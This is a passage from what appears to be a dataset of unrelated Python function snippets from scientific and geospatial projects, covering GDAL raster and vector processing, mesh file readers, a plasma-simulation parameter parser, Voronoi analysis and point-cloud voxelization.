******\"\r\n print \"* VPSC7 input parameters \"\r\n print \"* has been written down to \"\r\n print \"* '%8s' as below\"%vin_name\r\n print \"*****************************\\n\"\r\n if os.name=='nt':\r\n os.system('%s %s'%('type',vin_name))\r\n elif os.name=='posix':\r\n os.system('%s %s'%('cat',vin_name))\r\n else: pass", "def transfer_rast_to_vect(poly_cstr, lyrname, out_field, rast_cstr, srs, method, where=None, geom_field=\"geometry\",\n id_field=\"ogc_fid\", buffer_rad=0, restrict_to_tile=True):\n ds = gdal.Open(rast_cstr)\n georef = ds.GetGeoTransform()\n raster_array = ds.ReadAsArray()\n img_shape = (ds.RasterYSize, ds.RasterXSize)\n LOG.info(\"Done reading raster, shape is: %s\", img_shape)\n ctx = {\n 'lyrname': lyrname,\n 'out_field': out_field,\n 'where': where,\n 'geom_field': geom_field,\n 'id_field': id_field,\n \"srs\": srs\n }\n if buffer_rad:\n ctx['geom_field'] = 'st_buffer({}, {})'.format(geom_field, buffer_rad)\n layer_sql = \"\"\"select {geom_field}, {out_field}, {id_field} as the_id from {lyrname}\"\"\".format(**ctx)\n if restrict_to_tile:\n # Weird geoms could be skipped by this, so add as an optione\n layer_sql += \" where st_intersects({geom_field}, st_geomfromtext(WKT_EXT, {srs}))\".format(**ctx)\n\n if where:\n if restrict_to_tile:\n layer_sql += \" and \" + where\n else:\n layer_sql += \" where \" + where\n LOG.info(\"Layersql: %s\", layer_sql)\n extent = get_extent(georef, img_shape)\n LOG.info(\"Extent: %s\", extent)\n vec_ds, lyr = open(poly_cstr, layersql=layer_sql, extent=extent, open_for_update=True)\n mask = just_burn_layer(lyr, georef, img_shape, attr='the_id', dtype=np.int32, all_touched=False)\n LOG.info(\"Done burning - setting attr in %d features\", lyr.GetFeatureCount())\n LOG.debug(\"%s\", np.unique(mask))\n n_ok = 0\n for n, feat in enumerate(lyr):\n if n % 100 == 0:\n LOG.info(\"Done: %d, ok: %d\", n, n_ok)\n daid = feat['the_id']\n ctx['the_id'] = daid\n area = feat.GetGeometryRef().GetArea()\n I, J = np.where(mask == daid)\n # At least 30% covered if already set - todo: provide this as argument\n if I.size > 0 and (feat[out_field] is None or I.size * (georef[1] ** 2) > area * 0.3):\n is_ok, val = method(raster_array, I, J)\n if is_ok:\n n_ok += 1\n ctx['_value_'] = val\n updatesql = \"update {lyrname} set {out_field}={_value_} where {id_field}={the_id}\".format(**ctx)\n LOG.debug(\"Executing: %s\", updatesql)\n vec_ds.ExecuteSQL(updatesql)\n else:\n LOG.debug(\"Nothing found for %s - mask size: %s, valid: %s, area: %s\",\n daid, I.size, feat.GetGeometryRef().IsValid(), area)", "def readGR3File(inputFilename):\n print 'Reading ' + inputFilename + ' ...'\n infile = open(inputFilename, 'r')\n description = infile.readline().strip() # remove leading/trailing whitespace\n tmpStr = infile.readline()\n nTriangles, nNodes = (int(s) for s in tmpStr.split())\n print ' nTriangles={0:d} nNodes={1:d}'.format(nTriangles, nNodes)\n\n # nodes\n nodeArray = readNodeBlock(infile, nNodes)\n nodenum = np.array(nodeArray[:, 0].flatten(), dtype=int)\n nodexyz = np.zeros((nNodes, 3))\n nodexyz[:, :2] = nodeArray[:, 1:3]\n nodalValues = nodeArray[:, 3]\n\n print ' Nodal values min={0:g} max={1:g}'.format(min(nodalValues), max(nodalValues))\n\n # triangular elements\n triArray = readElemBlock(infile, nTriangles)\n\n trinum = triArray[:, 0].flatten()\n tritype = triArray[0, 1]\n trinodes = triArray[:, -3:] - 1 # three last columns, 0-based indexing\n #triangles = meshElements(trinodes,trinum,tritype)\n\n x = nodexyz[:, 0]\n y = nodexyz[:, 1]\n\n tmpStr = infile.readline()\n boundaries = []\n if len(tmpStr) > 0:\n # boundary information, if not end of file\n nOpenBndSegments = int(tmpStr.split()[0])\n nOpenBndNodesTot = int(infile.readline().split()[0])\n print ' nOpenBndSegments={0:d} nOpenBndNodesTot={1:d}'.format(nOpenBndSegments, nOpenBndNodesTot)\n for iBnd in range(nOpenBndSegments):\n bndHeader = infile.readline().split()\n nBndNodes = int(bndHeader[0])\n tag = bndHeader[-1]\n if tag.isdigit():\n tag = 'open' + tag\n print ' open bnd {0:d} {1:s}: {2:d} nodes'.format(iBnd + 1, tag, nBndNodes)\n tmpList = []\n for iN in range(nBndNodes):\n tmpList.append(int(infile.readline()))\n nodes = np.array(tmpList, dtype=int) - 1\n boundaries.append(meshContainer.meshBoundary('open', tag, nodes))\n nLandBndSegments = int(infile.readline().split()[0])\n nLandBndNodesTot = int(infile.readline().split()[0])\n landBndTags = range(\n nOpenBndSegments + 1,\n nOpenBndSegments + nLandBndSegments + 1)\n print ' nLandBndSegments={0:d} nLandBndNodesTot={1:d}'.format(nLandBndSegments, nLandBndNodesTot)\n for iBnd in range(nLandBndSegments):\n bndHeader = infile.readline().split()\n nBndNodes = int(bndHeader[0])\n try:\n landType = int(bndHeader[1])\n except:\n print \"\"\"Land boundary type missing in gr3 file. Add 0/1 (land/island) after number of nodes in each land boudary, e.g.\n 1002 = Total number of closed boundary nodes\n 501 0 = Number of nodes in closed boundary 1\"\"\"\n raise Exception(\n 'Could not parse land boundary type (0/1 - land/island)\\n')\n landType = 'island' if landType == 1 else 'land'\n tag = landType + bndHeader[-1]\n print ' land bnd {0:d} {1:s}: {2:d} nodes'.format(iBnd + 1, tag, nBndNodes)\n tmpList = []\n for iN in range(nBndNodes):\n tmpList.append(int(infile.readline()))\n #tmpList = fromfile(infile,dtype=int,count=nBndNodes,sep=' ')\n nodes = np.array(tmpList, dtype=int) - 1\n boundaries.append(meshContainer.meshBoundary(landType, tag, nodes))\n\n infile.close()\n\n # for better interpolation, round coordinates to 1e-4\n nDig = 4\n x = np.round(x, nDig)\n y = np.round(y, nDig)\n\n return x, y, nodalValues, trinodes, boundaries, description", "def mrtrix_mesh2vox(surface_path, template_path, temp_dir, output_prefix):\n # Adapt affine translation using metadata\n template = nib.load(template_path)\n _, _, meta = read_geometry(surface_path, read_metadata=True)\n\n template = nib.as_closest_canonical(template)\n affine = template.affine.copy()\n affine[:-1, -1] = template.affine[:-1, -1] - meta['cras']\n\n new_template = nib.Nifti1Image(template.dataobj, affine)\n new_template_path = temp_dir / 'template.mgz'\n nib.save(new_template, new_template_path)\n\n # Reconstruct volume from mesh\n subprocess.run(['mesh2voxel', surface_path, new_template_path, temp_dir / f'{output_prefix}_output.mgz'])\n\n # Save the reconstructed volume with the right affine\n output = nib.load(temp_dir / f'{output_prefix}_output.mgz')\n new_output = nib.Nifti1Image(output.dataobj, template.affine)\n # nib.save(new_output, output_path)\n\n return new_output", "async def transform(self, file):\n\t\tpass", "def load_rd_uv(in_file):\n uv_data = np.load(in_file)\n return uv_data['ucs'], uv_data['vcs']", "def inputfile(filename):\n infile = open(filename, 'r')\n lines = infile.readlines()\n\n # --------------------------------------------------------------------------\n # Domain specifications\n\n Nx = eval(lines[15][lines[15].find('=')+1:].strip())\n ax = eval(lines[16][lines[16].find('=')+1:].strip())\n bx = eval(lines[17][lines[17].find('=')+1:].strip())\n\n Ny = eval(lines[21][lines[21].find('=')+1:].strip())\n ay = eval(lines[22][lines[22].find('=')+1:].strip())\n by = eval(lines[23][lines[23].find('=')+1:].strip())\n\n Nz = eval(lines[27][lines[27].find('=')+1:].strip())\n az = eval(lines[28][lines[28].find('=')+1:].strip())\n bz = eval(lines[29][lines[29].find('=')+1:].strip())\n\n Nvx = eval(lines[33][lines[33].find('=')+1:].strip())\n avx = eval(lines[34][lines[34].find('=')+1:].strip())\n bvx = eval(lines[35][lines[35].find('=')+1:].strip())\n\n Nvy = eval(lines[39][lines[39].find('=')+1:].strip())\n avy = eval(lines[40][lines[40].find('=')+1:].strip())\n bvy = eval(lines[41][lines[41].find('=')+1:].strip())\n\n Nvz = eval(lines[45][lines[45].find('=')+1:].strip())\n avz = eval(lines[46][lines[46].find('=')+1:].strip())\n bvz = eval(lines[47][lines[47].find('=')+1:].strip())\n\n Nt = eval(lines[51][lines[51].find('=')+1:].strip())\n T = eval(lines[52][lines[52].find('=')+1:].strip())\n\n N = eval(lines[58][lines[58].find('=')+1:].strip())\n\n # --------------------------------------------------------------------------\n # Broadcast notification regarding start of simulation and order of solver\n\n print \"\\nStarting 1D1V Vlasov-Poisson simulation\"\n print \"\\nadvection solver: LTE order %d\" % (N+1)\n\n # --------------------------------------------------------------------------\n # Boundary conditions\n\n # stored as a dictionary of dictionaries, access as\n # BC['z']['upper'] and BC['z']['lower'] for z = {x, y, ...}\n\n BC = {}\n # main dictionary with key/values {'x' : {'lower' : value, 'upper : value},\n # {'y' : {'lower' : value, 'upper : value},\n # {'z' : {'lower' : value, 'upper : value},\n # {'vx' : {'lower' : value, 'upper : value},\n # {'vy' : {'lower' : value, 'upper : value},\n # {'vz' : {'lower' : value, 'upper : value},\n\n\n # subdictionaries with key/values {'lower' : BC_value, and 'upper' : BC_value}\n BC['x'] = {}\n BC['x']['lower'] = lines[18][lines[18].find('=')+1:].strip()\n BC['x']['upper'] = lines[19][lines[19].find('=')+1:].strip()\n\n BC['y'] = {}\n BC['y']['lower'] = lines[24][lines[24].find('=')+1:].strip()\n BC['y']['upper'] = lines[25][lines[25].find('=')+1:].strip()\n\n BC['z'] = {}\n BC['z']['lower'] = lines[30][lines[30].find('=')+1:].strip()\n BC['z']['upper'] = lines[31][lines[31].find('=')+1:].strip()\n\n BC['vx'] = {}\n BC['vx']['lower'] = lines[36][lines[36].find('=')+1:].strip()\n BC['vx']['upper'] = lines[37][lines[37].find('=')+1:].strip()\n\n BC['vy'] = {}\n BC['vy']['lower'] = lines[42][lines[42].find('=')+1:].strip()\n BC['vy']['upper'] = lines[43][lines[43].find('=')+1:].strip()\n\n BC['vz'] = {}\n BC['vz']['lower'] = lines[48][lines[48].find('=')+1:].strip()\n BC['vz']['upper'] = lines[49][lines[49].find('=')+1:].strip()\n\n # --------------------------------------------------------------------------\n # Store number of active gridpoints for every phase space variable\n #\n # Note: for periodic BCs: Nz_active = Nz - 1\n # for all other BCs: Nz_active = Nz\n\n # TODO this is acknowledged as being redundant, but more specific than the lists\n # active_dims vs. total_dims\n if BC['x']['lower'] == 'periodic' and BC['x']['upper'] == 'periodic' and Nx is not None:\n Nx_active = Nx - 1\n else:\n Nx_active = Nx\n\n if BC['y']['lower'] == 'periodic' and BC['y']['upper'] == 'periodic' and Ny is not None:\n Ny_active = Ny - 1\n else:\n Ny_active = Ny\n\n if BC['z']['lower'] == 'periodic' and BC['z']['upper'] == 'periodic' and Nz is not None:\n Nz_active = Nz - 1\n else:\n Nz_active = Nz\n\n if BC['vx']['lower'] == 'periodic' and BC['vx']['upper'] == 'periodic' and Nvx is not None:\n Nvx_active = Nvx - 1\n else:\n Nvx_active = Nvx\n\n if BC['vy']['lower'] == 'periodic' and BC['vy']['upper'] == 'periodic' and Nvy is not None:\n Nvy_active = Nvy - 1\n else:\n Nvy_active = Nvy\n\n if BC['vz']['lower'] == 'periodic' and BC['vz']['upper'] == 'periodic' and Nvz is not None:\n Nvz_active = Nvz - 1\n else:\n Nvz_active = Nvz\n\n # --------------------------------------------------------------------------\n # High order correction (HOC) method applied to each phase space variable\n\n HOC = {}\n HOC['x'] = lines[68][lines[68].find(':')+1:].strip().upper()\n HOC['y'] = lines[69][lines[69].find(':')+1:].strip().upper()\n HOC['z'] = lines[70][lines[70].find(':')+1:].strip().upper()\n\n HOC['vx'] = lines[72][lines[72].find(':')+1:].strip().upper()\n HOC['vy'] = lines[73][lines[73].find(':')+1:].strip().upper()\n HOC['vz'] = lines[74][lines[74].find(':')+1:].strip().upper()\n\n\n # list of phase space variables used, in etc/params.dat must set unused\n # vars to have Nz as None, z = x, vx, y, ...\n # e.g. in 1D1V, phasespace_vars = ['x', 'vx']\n phasespace_vars = []\n if Nx is not None:\n phasespace_vars.append('x')\n if Ny is not None:\n phasespace_vars.append('y')\n if Nz is not None:\n phasespace_vars.append('z')\n if Nvx is not None:\n phasespace_vars.append('vx')\n if Nvy is not None:\n phasespace_vars.append('vy')\n if Nvz is not None:\n phasespace_vars.append('vz')\n\n print \"will step through %d-dimensional solution in variables: %s\" % (len(phasespace_vars), phasespace_vars)\n for var in phasespace_vars:\n print \"high order correction method on %s: %s\" % (var, HOC[var])\n\n # for periodic BCs, the number of active dims is not equal to the\n # total number of dims, we evolve \"Nz-1\" gridpoints, then assign\n # the Nth point by periodicity as equal to the 0th point. Hence,\n # a distinction is needed between active dims and total dims\n # where we note they are identical in all cases but periodic BCs.\n\n # TODO as mentioned above, this is now a redundant set of total grid points\n # as compared to active grid points. At some point, need to trace where\n # this is actually used in the code and replace or remove it\n\n # initialize lists\n total_dims = []\n active_dims = []\n\n # strip all whitespace in each entry\n for var in phasespace_vars:\n total_dims.append(eval('N' + var))\n\n if ( (BC[var]['lower'] == 'periodic') and (BC[var]['upper'] == 'periodic') ):\n active_dims.append(eval('N' + var) - 1)\n else:\n active_dims.append(eval('N' + var))\n\n # TODO this is a misleading name, should be numvars\n numdims = len(phasespace_vars)\n\n # --------------------------------------------------------------------------\n # Initial density specification\n #\n # the following establishes a difference between the number of densities\n # specified in etc/params.dat. Should there be two, the solver is a two\n # species Vlasov solver. If only one, then a cold background will be\n # automatically computed (TODO)\n\n\n densities_list = lines[79][lines[79].find(':')+1:].strip().split(', ')\n for i in range(len(densities_list)):\n densities_list[i] = densities_list[i].lower()\n\n if len(densities_list) == 2: # if two species return dictionary of strings\n density = {}\n density['electrons'] = densities_list[0]\n density['electrons'] = density['electrons'].lower()\n density['ions'] = densities_list[1]\n density['ions'] = density['ions'].lower()\n print \"\\ntwo species simulation with initial densities:\\n\"\n print \"electrons: %s\" % density['electrons']\n print \"ions: %s\\n\" % density['ions']\n\n elif len(densities_list) == 1: # if one species return a string\n density = densities_list[0]\n print \"one species (electron) simulation with initial density: %s\" % density\n # TODO compute cold background, store both this and the above\n # in a common dictionary as above for two species.\n\n # --------------------------------------------------------------------------\n # Split scheme specification\n\n split_scheme = lines[98][lines[98].find('=')+1:].strip()\n split_scheme = split_scheme.upper()\n print \"split scheme: %s\\n\\n\" % split_scheme\n\n # filepath to splitting coefficient tables\n filename = lines[99][lines[99].find(':')+1:].strip()\n filepath = './etc/' + filename\n\n # get splitting coefficients for chosen scheme\n if split_scheme is not None:\n splitting = splitting_coefficients(filepath, split_scheme)\n else:\n splitting = None\n\n # --------------------------------------------------------------------------\n # Plot window specification (used in lib.plots.Setup)\n\n xmin = eval(lines[113][lines[113].find('=')+1:].strip())\n xmax = eval(lines[114][lines[114].find('=')+1:].strip())\n ymin = eval(lines[116][lines[116].find('=')+1:].strip())\n ymax = eval(lines[117][lines[117].find('=')+1:].strip())\n\n plot_params = dict(xmin = xmin, xmax = xmax,\n ymin = ymin, ymax = ymax)\n\n record_outputs = lines[120][lines[120].find(':')+1:].strip()\n record_outputs = record_outputs.lower()\n\n if record_outputs == 'yes':\n # output filepath setup\n filename = lines[121][lines[121].find(':')+1:].strip()\n filepath = './etc/' + filename\n outfiles = output_files(filepath) # dictionary of opened files\n else:\n outfiles = None\n\n # --------------------------------------------------------------------------\n # MISC STORAGE (e.g. stored matrices that are used routinely)\n #\n # dictionaries and matrices relevant for high order correction applications\n #\n # Constructing the finite different weight matricies, W.\n #-------------------------------------------------------\n # requires: (dict) FD_schemes\n #\n # Note: FD_schemes is only needed to construct W. W is what is used in\n # the simulation. Hence, the building routine for FD_schemes\n # is not optimized, since it happens before the simulation starts\n # and hence is not a source of repeated computational cost.\n #\n # FD_schemes is a dictionary containing the families of every order derivative\n # needed for the indicated global error N in etc/params.dat, i.e. all schemes\n # of various degrees of asymmetry and handedness. For large N, this can be a\n # very large dictionary, see the function routine read_FD_schemes to see all\n # that gets stored inside. It is used to construct the difference coefficient\n # matrices W (for applying high order corrections). The other scheme\n # FD_scheme_dn1 is used to construct the matrix W_dn1 which is a difference\n # coefficient matrix for the first derivative (dn = 1) at LTE = 6, and used\n # in the finite difference 6th order Poisson solver (PBCs currently only).\n #---------------------------------------------------------------------------\n #\n # initialize all dictionaries whose keys correspond to phase space vars\n # and whose values contain the relevant ndarrays\n\n Xi = {}\n xi = {}\n W = {}\n\n # top level check: if any var has FD corrections, store FD_schemes and init W\n if 'FD' in HOC.values():\n # store finite difference schemes\n FD_schemes = read_FD_schemes(N)\n\n if HOC['x'] == 'FD':\n # first derivative with LTE = 6, used to find dphi = -E after phi is\n # found from a 6th order Poisson solve\n FD_scheme_dn1 = read_FD_scheme(1,6)\n W_dn1_LTE6 = assemble_finite_difference_weight_matrix_const_dn_const_LTE(Nx_active,\n FD_scheme_dn1,\n dn = 1,\n LTE = 6\n )\n\n # TODO if more than one or different spatial dimension\n # TODO than 'x' with FD corrections need to permit access to this\n # TODO dictionary W_dn1_LTE6 and have it be assembled.\n\n else:\n # else, Fourier Gauss solver is used, no need for this matrix\n W_dn1_LTE6 = None\n\n # variable-by-variable checks: assemble consistent objects needed\n # for the specified means of HOC from etc/params.dat\n\n # Note: the following is organized with the expectation that\n # higher dimensional implementations would be stepped through\n # as sets of 2D advection problems, always paired as z and vz\n # i.e. not as mixed stepthroughs with x paired with vy for example\n\n for var in phasespace_vars:\n if HOC[var] == 'FD':\n W[var] = assemble_finite_difference_weight_matrix(\n eval('N' + var + '_active'),\n N,\n FD_schemes\n )\n elif HOC[var] == 'FOURIER':\n # ensure the correct number of grid points\n # is passed for the generalized velocity Nvz_active\n # for x,y,z, 'vz' = vx, vy, vz\n # for vx, vy, vz, 'vz' = ax, ay, az, which have\n # the same number of dims as x, y, z, respectively\n\n if var[0] == 'v':\n Nvz_active = eval('N' + var[1] + '_active')\n else:\n Nvz_active = eval('Nv' + var + '_active')\n\n Xi, xi = assemble_spectral_derivative_operator(Xi, xi,\n var,\n eval('a' + var),\n eval('b' + var),\n eval('N' + var),\n eval('N' + var + '_active'),\n Nvz_active,\n N)\n\n # ---------------------------------------------------------------------\n # \"Alternating\" identity matrix\n\n\n # in lib.HOC.correctors, require an N x N diagonal matrix with entries\n # (-1)^i, where i is the row number, for details see on github\n #\n # dsirajud/IPython-notebooks/\n # DECSKS-09 -- array-based implementation recast -- part 1.ipynb\n #\n # section \"2D casting of correction coefficients c (vector) -> c (tensor)\"\n\n I_alternating = np.diag( (-np.ones(N)) ** np.arange(N) )\n\n # obtain Bernoulli numbers (note: list only 23 numbers are listed)\n # for a correction up to global error order N, N-1 Bernoulli numbers\n # are needed. If higher than global error order 22 is desired, additional\n # Bernoulli numbes need to be entered in\n #\n # etc/Table_of_Bernoulli_numbers.dat\n #\n\n # Store Bernoulli numbers from dat file etc/Table_of_Bernoulli_numbers.dat\n filename = 'Table_of_Bernoulli_numbers.dat'\n filepath = './etc/' + filename\n Bernoulli_numbers = Bernoulli(filepath)\n\n # \"A\" matrices for Bernoulli number storage and matrix HOC application\n # in lib.HOC.Beta_matrix, see notebook on github at\n # dsirajud/IPython-notebooks/\n # DECSKS-09 -- array-based implementation recast -- part 1.ipynb\n A_pos, A_neg = np.zeros([N,N]), np.zeros([N,N])\n for i in range(N):\n for j in range(i+1):\n A_pos[i,j] = Bernoulli_numbers[i-j] / scipy.misc.factorial(i-j)\n if (i - j) == 1:\n A_neg[i,j] = -A_pos[i,j]\n else:\n A_neg[i,j] = A_pos[i,j]\n\n A_matrix = {}\n # dictionary container\n # allow dictionary access to relevant matrix of Bernoulli numbers\n # by operating with str(int(np.sign(CFL.frac)))\n\n A_matrix['1'] = A_pos\n A_matrix['0'] = A_pos\n A_matrix['-1'] = A_neg\n\n\n # ---------------------------------------------------------------------\n # 6th order finite difference Poisson solver for periodic BCs\n # (stored as keys 'D' [difference matrix] and 'B' [inhomogeneity])\n\n Poisson_6th_order_PBC_FD_solver_matrices = assemble_Poisson_6th_order_PBC_FD_solver_matrices(Nx, BC)\n\n # TODO specialize right now to just be x, vx. Figure out how to generalize later with higher dimensions\n compute_electric_field_function_handle_prefix = \"DECSKS.lib.fieldsolvers.compute_electric_field_\"\n compute_electric_field_function_handle = \"\".join((compute_electric_field_function_handle_prefix, HOC['x'].lower()))\n\n derivative_method = {}\n derivative_method_prefix = 'DECSKS.lib.derivatives'\n for var in phasespace_vars:\n derivative_method[var] = \".\".join((derivative_method_prefix, HOC[var].lower()))\n\n sim_params = dict(\n N = N, HOC = HOC,\n derivative_method = derivative_method,\n Nx = Nx, ax = ax, bx = bx,\n Ny = Ny, ay = ay, by = by,\n Nz = Nz, az = az, bz = bz,\n Nvx = Nvx, avx = avx, bvx = bvx,\n Nvy = Nvy, avy = avy, bvy = bvy,\n Nvz = Nvz, avz = avz, bvz = bvz,\n Nt = Nt, T = T,\n phasespace_vars = phasespace_vars,\n numdims = numdims,\n active_dims = active_dims,\n total_dims = total_dims,\n density = density,\n split_scheme = split_scheme,\n splitting = splitting,\n plot_params = plot_params,\n record_outputs = record_outputs,\n outfiles = outfiles,\n BC = BC, # boundary conditions on all phase space variables\n I_alternating = I_alternating, # identity matrix with alternating signs according to row, used in computing correctors c\n A_matrix = A_matrix, # Matrices of Bernoulli numbers for HOC\n W = W,\n W_dn1_LTE6 = W_dn1_LTE6,\n Xi = Xi, # spectral differentiation operator matrix (1j*xi[i,j]) ** q\n xi = xi, # wave number vector\n Poisson_6th_order_PBC_FD_solver_matrices = Poisson_6th_order_PBC_FD_solver_matrices,\n compute_electric_field_function_handle = compute_electric_field_function_handle # determines if solver is FD or fourier based\n )\n\n infile.close()\n\n return sim_params", "def create_raster_datapackage(pk_type, path, file_flag, out_path):\n process_source(pk_type, path, file_flag, out_path)", "def readtempfilt(MAIN_OUTPUT_FILE='photz', OUTPUT_DIRECTORY='./OUTPUT'):\n\n root = os.path.join(OUTPUT_DIRECTORY, MAIN_OUTPUT_FILE)\n \n ###### .tempfilt\n file_path = root+'.tempfilt'\n \n if os.path.exists(file_path) is False:\n raise ValueError('File, %s, not found.' %(file_path))\n\n with open(file_path,'rb') as f:\n # summary data\n s = np.fromfile(file=f,dtype=np.int32, count=4)\n NFILT=s[0] # number of filters\n NTEMP=s[1] # number of templates\n NZ=s[2] # number points on the redshift grid\n NOBJ=s[3] # number of objects\n # (?) template SED convolved with filter transmission at each redshift\n tempfilt = np.fromfile(file=f,dtype=np.double,count=NFILT*NTEMP*NZ).reshape((NZ,NTEMP,NFILT)).transpose()\n # filter pivot wavelengths\n lc = np.fromfile(file=f,dtype=np.double,count=NFILT)\n # redshift grid\n zgrid = np.fromfile(file=f,dtype=np.double,count=NZ)\n # observed flux\n fnu = np.fromfile(file=f,dtype=np.double,count=NFILT*NOBJ).reshape((NOBJ,NFILT)).transpose()\n # (?) error in observed flux\n efnu = np.fromfile(file=f,dtype=np.double,count=NFILT*NOBJ).reshape((NOBJ,NFILT)).transpose()\n \n tempfilt = {'NFILT':NFILT,'NTEMP':NTEMP,'NZ':NZ,'NOBJ':NOBJ,\\\n 'tempfilt':tempfilt,'lc':lc,'zgrid':zgrid,'fnu':fnu,'efnu':efnu}\n\n return tempfilt", "def trimesh_to_vrml(mesh, output_file):\n\n with open(output_file, 'w') as f:\n f.write('#VRML V2.0 utf8\\n')\n f.write('Transform {\\n'\n ' children [\\n'\n ' Shape {\\n'\n ' geometry IndexedFaceSet {\\n'\n ' coord Coordinate {\\n'\n ' point[\\n')\n for v in mesh.vertices:\n f.write(' {:0.6f} {:0.6f} {:0.6f},\\n'.format(*v.tolist()))\n f.write(' ] # end of points\\n'\n ' } # end of Coordinate\\n'\n ' coordIndex [\\n')\n\n for face in mesh.faces:\n f.write(' {:d}, {:d}, {:d}, -1,\\n'.format(*face.tolist()))\n\n f.write(' ] # end of coordIndex\\n'\n ' } # end of geometry\\n'\n ' appearance Appearance {\\n'\n ' material Material {\\n'\n ' diffuseColor 0.7 0.7 0.7\\n'\n ' emissiveColor 0.05 0.05 0.05\\n'\n ' specularColor 1.0 1.0 1.0\\n'\n ' ambientIntensity 0.2\\n'\n ' shininess 0.2\\n'\n ' transparency 0.0\\n'\n ' } #end of material\\n'\n ' } #end of appearance\\n'\n ' } # end of Shape\\n'\n ' ] # end of children\\n'\n '}\\n')", "def cal_voro(inputfile, ndim, radii, ppp = '-p', results_path = '../../analysis/voro/'): \n if not os.path.exists(results_path):\n os.makedirs(results_path)\n\n basename = os.path.splitext(os.path.basename(inputfile))[0]\n fneighbor = open(results_path + basename + '.neighbor.dat', 'w')\n ffacearea = open(results_path + basename + '.facearea.dat', 'w')\n findex = open(results_path + basename + '.voroindex.dat', 'w') \n foverall = open(results_path + basename + '.overall.dat', 'w')\n\n position, bounds = get_input(inputfile, ndim, radii)\n for n in range(len(position)):\n fileformat = '%d ' + '%.6f ' * ndim + '%.2f'\n np.savetxt('dumpused', position[n], fmt = fileformat)\n \n #use box boundaries from snapshot\n Boxbounds = bounds[n].ravel()\n #use box boundaries from particle coordinates \n # boundsmin = position[n][:, 1: ndim + 1].min(axis = 0) - 0.1\n # boundsmax = position[n][:, 1: ndim + 1].max(axis = 0) + 0.1\n # Boxbounds = (np.column_stack((boundsmin, boundsmax))).ravel()\n\n cmdline = 'voro++ ' + ppp + ' -r -c \"%i %s %v %F @%i %A @%i %s %n @%i %s %f\" '\\\n + ('%f %f ' * ndim % tuple(Boxbounds)) + 'dumpused'\n if n == 0: print (cmdline)\n subprocess.run(cmdline, shell = True)\n\n fneighbor.write('id cn neighborlist\\n')\n ffacearea.write('id cn facearealist\\n')\n findex.write('id voro_index 0_to_7_faces\\n')\n foverall.write('id cn volume facearea\\n')\n f = open('dumpused.vol', 'r')\n for i in range(len(position[n][:, 0])):\n item = f.readline().split('@')\n foverall.write(item[0] + '\\n')\n findex.write(item[1] + '\\n')\n fneighbor.write(item[2] + '\\n')\n ffacearea.write(item[3])\n f.close()\n\n os.remove('dumpused') #delete temporary files\n os.remove('dumpused.vol')\n fneighbor.close()\n ffacearea.close()\n foverall.close()\n findex.close()\n print ('---------- Voronoi Analysis Done ------------')", "def reprojectAndSaveNewRaster(inFilepath,outFilepath,to_EPSG):\r\n from osgeo import gdal\r\n input_raster = gdal.Open(inFilepath)\r\n EPSG_string = \"EPSG:\"+str(to_EPSG)\r\n ras = gdal.Warp(outFilepath,input_raster,dstSRS=EPSG_string)\r\n del ras", "def voxelization(infile_path, outfile_path, voxel_size):\n\n infile = laspy.file.File(infile_path, mode=\"rw\")\n\n # 计算每个点的voxel码\n scaled_x = np.vectorize(int)((1 / voxel_size) * (infile.x - infile.header.min[0]))\n scaled_y = np.vectorize(int)((1 / voxel_size) * (infile.y - infile.header.min[1]))\n scaled_z = np.vectorize(int)((1 / voxel_size) * (infile.z - infile.header.min[2]))\n indices = np.lexsort((scaled_z, scaled_y, scaled_x))\n voxel_count = 0\n point_count = 0\n point_lengh = len(infile.x)\n\n # the array to store the code of the voxel, this is actually the row, columm and height number of the voxel\n code_array = []\n\n # the array to store the point number in each voxel\n points_in_one_voxel_array = []\n\n # the array to store the average intensity of points in a voxel\n intensity_in_one_voxel_array = []\n\n while point_count < point_lengh - 1:\n\n # the counter of points number in one voxel\n points_in_one_voxel_count = 1\n intensity_in_one_voxel_count = 0\n # loop of finding points with same code\n while point_count < point_lengh - 1 and \\\n scaled_x[indices[point_count + 1]] == scaled_x[indices[point_count]] and \\\n scaled_y[indices[point_count + 1]] == scaled_y[indices[point_count]] and \\\n scaled_z[indices[point_count + 1]] == scaled_z[indices[point_count]]:\n # add a voxel index label to the point\n infile.voxel_index[indices[point_count]] = voxel_count\n intensity_in_one_voxel_count += infile.intensity[indices[point_count]]\n point_count += 1\n points_in_one_voxel_count += 1\n\n infile.voxel_index[indices[point_count]] = voxel_count\n intensity_in_one_voxel_count += infile.intensity[indices[point_count]]\n intensity_in_one_voxel_array.append(intensity_in_one_voxel_count / points_in_one_voxel_count)\n points_in_one_voxel_array.append(points_in_one_voxel_count)\n # save the code to an array which later will be stored in the csv file\n code = \"{:0>4d}\".format(scaled_x[indices[point_count]]) + \\\n \"{:0>4d}\".format(scaled_y[indices[point_count]]) + \\\n \"{:0>4d}\".format(scaled_z[indices[point_count]])\n code_array.append(code)\n point_count += 1\n voxel_count += 1\n\n # save the code to the csv file sequentially\n code_array_length = len(code_array)\n with open(outfile_path, 'wb') as csvfile:\n writer = csv.writer(csvfile)\n count = 0\n while count < code_array_length:\n writer.writerow([code_array[count], points_in_one_voxel_array[count], intensity_in_one_voxel_array[count]])\n count += 1", "def _rasterize_vector_onto_base(\n base_raster_path, base_vector_path, attribute_id,\n target_raster_path, filter_string=None):\n base_raster = gdal.OpenEx(base_raster_path, gdal.OF_RASTER)\n raster_driver = gdal.GetDriverByName('GTiff')\n target_raster = raster_driver.CreateCopy(target_raster_path, base_raster)\n base_raster = None\n\n vector = gdal.OpenEx(base_vector_path)\n layer = vector.GetLayer()\n\n if filter_string is not None:\n layer.SetAttributeFilter(str(filter_string))\n gdal.RasterizeLayer(\n target_raster, [1], layer,\n options=['ATTRIBUTE=%s' % attribute_id])\n target_raster.FlushCache()\n target_raster = None\n layer = None\n vector = None", "def compilation(inputfile):\r\n\r\n # create empty dictionary to hold DataFrames\r\n f = {}\r\n\r\n # generate list of relevant files\r\n filelist = glob.glob(inputfile)\r\n\r\n # iterate through list of relevant files\r\n for infile in filelist:\r\n # run computations using lev files\r\n f[getfilename(infile)] = new_trans_imp(infile)\r\n # concatenate all of the DataFrames in dictionary f to one DataFrame: g\r\n g = pd.concat(f)\r\n # remove multiindex and replace with index=Datetime\r\n g = g.reset_index()\r\n g = g.set_index(['DateTime'])\r\n # drop old indexes\r\n g = g.drop(['level_0'], axis=1)\r\n # remove duplicates based on index then sort by index\r\n g['ind'] = g.index\r\n g.drop_duplicates(subset='ind', inplace=True)\r\n g.drop('ind', axis=1, inplace=True)\r\n g = g.sort_index()\r\n outfile = g\r\n return g", "def _read_dx(self, 